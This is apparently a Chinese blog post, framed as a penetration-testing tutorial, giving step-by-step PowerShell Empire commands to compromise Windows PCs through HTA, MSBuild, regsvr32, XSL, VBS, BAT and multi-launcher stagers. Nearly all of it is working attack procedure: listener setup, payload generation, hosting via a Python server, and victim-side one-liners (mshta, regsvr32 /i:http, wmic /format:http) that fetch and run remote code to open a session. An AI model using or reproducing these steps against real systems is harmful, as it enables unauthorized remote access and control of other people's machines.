zoukankan      html  css  js  c++  java
  • 使用PowerShell Empire攻击Windows PC的多种方法

    通过HTA开发

    这种攻击有助于我们通过.hta利用Windows。当通过mshta.exe运行.hta文件时,它将以具有相似功能的.exe文件执行,这使我们无法破解。要了解有关此攻击的更多信息,请单击此处

    运行类型

    ./empire

    根据工作流程,首先,我们必须创建一个侦听器以侦听我们的本地计算机。键入以下命令:

    listeners

    运行上面的命令后,它将说“当前没有侦听器处于活动状态”,但是不用担心,我们现在进入侦听器界面。因此,在此侦听器界面中,输入:

    uselistener http

    set Host http://192.168.1.107

    execute

    现在已经创建了侦听器,在侦听器界面中键入“ back”以创建漏洞利用程序。为此,请输入:

    usestager windows/hta

    set Listener http

    set OutFile /root/1.hta

    execute

    运行以上命令将创建一个.hta文件以用作恶意软件。使用以下命令启动python服务器,以共享我们的.hta文件:

    python -m SimpleHTTPServer 8080

    随着python服务器启动并运行,请在受害者的命令提示符下键入以下命令以执行我们的恶意文件:

    mshta.exe http://192.168.1.107:8080/1.hta

    执行以上命令后,您将拥有会话,以访问会话类型:

    interact XDGM6HLE

    sysinfo

    通过MSBuild.exe利用

    我们的下一个漏洞利用是通过MSBuild.exe,它将使您可以使用XML文件进行Windows的远程会话。要了解有关此攻击的详细信息,请单击此处。并使用以下漏洞利用类型:

    listeners

    uselistener http

    set Host http://192.168.1.107

    execute

    这将创建一个侦听器,在侦听器界面中键入“ back”以创建一个利用程序。为此,请输入:

    usestager windows/launcher_xml

    set Listener http

    execute

    现在,在/ tmp中创建一个xml文件。将此文件复制到受害人的PC中(在Microsoft.NET Framework v4.0.30319 中),然后键入以下命令,运行该文件:

    cd C:WindowsMicrosoft.NETFrameworkv4.0.30319

    MSBuild.exe launcher.xml

    因此,通过这种方式,您可以进行会话,以访问所述会话类型:

    interact A8H14C7L

    sysinfo

    通过regsvr32开发

    我们的下一个方法是通过regsvr32进行利用。要详细了解此攻击,请单击此处。与往常一样,我们必须先创建一个监听器才能监听我们的本地计算机。键入以下命令:

    listeners

    uselistener http

    set Host http://192.168.1.107

    execute

    现在已经创建了侦听器,在侦听器界面中键入“ back”以创建漏洞利用程序。为此,键入:

    usestager windows/launcher_sct

    set Listener http

    execute

    这将在/ tmp中创建一个.sct文件。使用python服务器将此文件共享到受害者的PC,然后通过键入以下命令在受害者的PC的运行窗口中运行此文件:

    regsvr32.exe /u /n /s /i:http//192.168.1.107:8080/launcher.sct scrobj.dll

    因此,您将有一个活动的会话。要访问会话类型:

    interact <session name>

    sysinfo

    通过XSL开发

    XSL是一种可以帮助您格式化数据的语言,它还描述了Web服务器如何使用XML进行交互。我们对帝国的下一种攻击方法是利用.xsl文件。对于此方法,首先输入以下命令激活我们的侦听器:

    listeners

    uselistener http

    set Host http://192.168.1.107

    execute

    侦听器启动并运行后,创建您的利用程序:

    usestager windows/launcher_xsl

    set Listener http

    execute

    这样,将创建.xsl文件。现在从创建.xsl文件的文件夹中运行python服务器,如下图所示:

    cd /tmp

    python -m SimpleHTTPServer 8080

    现在,在受害者的命令提示符下执行以下命令:

    wmic process get brief /format:"http://192.168.1.107:8080/launcher.xsl"

    在上面运行将提供一个会话,以访问该会话类型:

    interact <session name>

    sysinfo

    通过Visual Basic脚本利用

    我们的下一个方法是创建一个恶意VBS文件并通过它利用我们的受害者。像往常一样,让我们​​先创建一个监听器。

    listeners

    uselistener http

    set Host http://192.168.1.107

    execute

    现在,创建我们的恶意.vbs文件类型:

    usestager windows/launcher_vbs

    set Listener http

    execute

    下一步是通过键入以下命令来启动python服务器:

    python -m SimpleHTTPServer 8080

    .vbs文件通过python服务器共享并在受害者的PC中执行后,您将拥有会话,就像访问会话类型之前一样:

    interact <session name>

    sysinfo

    通过bat文件利用

    在这种方法中,我们将通过.bat文件进行利用。就像我们之前的漏洞利用一样,这次也创建一个侦听器。为此,键入:

    listeners

    uselistener http

    set Host http://192.168.1.107

    execute

    back

    上面的命令将为您创建一个侦听器。让我们使用以下命令创建.bat文件:

    usestager windows/launcher_bat

    use Listener http

    set OutFile /root/1.bat

    execute

    如图所示,以上命令将创建一个.bat文件。使用以下命令启动python服务器,以允许您在受害者的PC上共享.bat文件。

    python -m SimpleHTTPServer 8080

    运行.bat文件后,将激活一个会话。要访问会话类型:

    interact <session name>

    sysinfo

    多发射器

    这是本文的最后一种方法。可以再次在各种平台(例如Windows,Linux等)上使用它,即使对于这种方法,也可以创建一个侦听器:

    listeners

    uselistener http

    set Host http://192.168.1.107

    execute

    然后键入以下命令来创建您的恶意文件:

    usestager multi/launcher

    set Listener http

    execute

    在上述命令后按Enter键,它将为您提供代码。复制此代码并将其粘贴到受害者的命令提示符中,然后按Enter。按下Enter键后,您将激活一个会话。要访问会话,请输入:

    interact <session name>

    sysinfo

    结论

    以上是可用于利用不同漏洞利用Windows的方法。使用此框架是Metasploit之后笔测试技巧的补充。请享用!

  • 相关阅读:
    MVC之Servlet控制器(二)
    MVC之Servlet控制器(一)
    基于Java实现批量下载网络图片
    @ModelAttribute运用详解
    MyBatis
    理解RESTful架构
    并行计算结课论文边写边总结2
    并行计算结课论文边写边总结(1)
    CUDA笔记(六)
    ubuntu12.04
  • 原文地址:https://www.cnblogs.com/sup3rman/p/13724590.html
Copyright © 2011-2022 走看看